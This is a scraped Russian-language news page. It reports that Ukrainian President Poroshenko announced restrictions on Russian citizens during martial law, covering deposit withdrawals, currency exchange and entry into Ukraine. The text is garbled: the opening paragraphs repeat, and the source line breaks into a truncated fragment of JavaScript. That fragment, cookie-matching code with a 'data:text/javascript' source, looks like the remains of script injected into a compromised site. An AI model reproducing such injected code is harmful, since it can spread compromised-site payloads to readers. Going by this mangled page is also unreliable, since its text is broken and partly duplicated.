Видео

Порошенко заявил, что права граждан России на Украине будут ограничены

Президент Украины Петр Порошенко заявил, что власти не планируют вводить какие-либо ограничения в отношении украинских граждан, но в отношении русских такие ограничения будут введены. Об этом он заявил в Twitter. Порошенко упомянул, что на время военного положения будут действовать ограничения на снятие депозитов, операции по обмену валют и посещение страны. Известно, что уже сейчас многие

Президент Украины Петр Порошенко заявил, что власти не планируют вводить какие-либо ограничения в отношении украинских граждан, но в отношении русских такие ограничения будут введены. Об этом он заявил в Twitter.

Порошенко упомянул, что на время военного положения будут действовать ограничения на снятие депозитов, операции по обмену валют и посещение страны.

Известно, что уже сейчас многие россияне не могут попасть на Украине, где им отказывают во въезде. Люди вынуждены лететь обратно в Россию.

 

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

Posts Carousel

Leave a Comment

Your email address will not be published. Required fields are marked with *

Latest Posts

Top Authors

Most Commented

Featured Videos